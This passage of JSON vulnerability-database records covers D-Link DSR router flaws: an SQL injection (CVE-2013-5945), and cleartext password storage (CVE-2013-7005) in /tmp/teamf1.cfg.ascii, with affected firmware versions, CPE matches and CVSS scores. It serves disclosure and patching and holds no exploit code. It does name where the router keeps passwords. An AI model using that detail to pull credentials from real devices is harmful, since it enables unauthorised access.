        "title": "Repair measures for SQL injection vulnerabilities in D-Link DSR Router Series",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=108894"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5945"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5945"
      },
      {
        "trust": 0.6,
        "url": "http://www.linuxidc.com/linux/2013-12/93897.htm"
      },
      {
        "trust": 0.3,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.exploit-db.com/papers/22930/"
      },
      {
        "trust": 0.1,
        "url": "http://tsd.dlink.com.tw"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5946"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "date": "2020-02-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "date": "2013-12-07T17:10:52",
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      },
      {
        "date": "2020-02-11T12:15:11.757000",
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "date": "2020-02-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "date": "2021-04-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      },
      {
        "date": "2024-11-21T01:58:28.210000",
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "SQL injection vulnerabilities in multiple D-Link products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.6
  }
}

var-201312-0290
Vulnerability from variot

D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 store account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#]["Password"] fields in /tmp/teamf1.cfg.ascii. D-Link DSR is a wireless service router product. The D-Link DSR router series has multiple information disclosure vulnerabilities involving account credentials, which allow an attacker to access sensitive information. The information obtained may lead to further attacks. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions. Note that the two version lists in this summary state different bounds for the same models; when checking a device, the "firmware before" versions in the first sentence are the wider of the two ranges.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0290",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-500n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b50"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b35"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b29"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b29"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b46"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b48"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-150 v1.08b44",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n v1.05b64",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250 and dsr-250n v1.08b44",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500 and dsr-500n v1.08b77",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000 and dsr-1000n v1.08b77",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.08b31"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.02b11"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b12"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.02b25"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b27"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.05b53"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b12"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b23"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-1000",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-1000n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-150",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-150n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-250",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-250n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-500",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-500n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "64461"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2013-7005",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2013-7005",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2013-15507",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-67007",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-7005",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-7005",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15507",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-401",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-67007",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 store account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii. D-Link DSR is a wireless service router product. The D-Link DSR router series has multiple information disclosure vulnerabilities affecting account credentials, which allow an attacker to access sensitive information. The information obtained may lead to further attacks. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "BID",
        "id": "64461"
      },
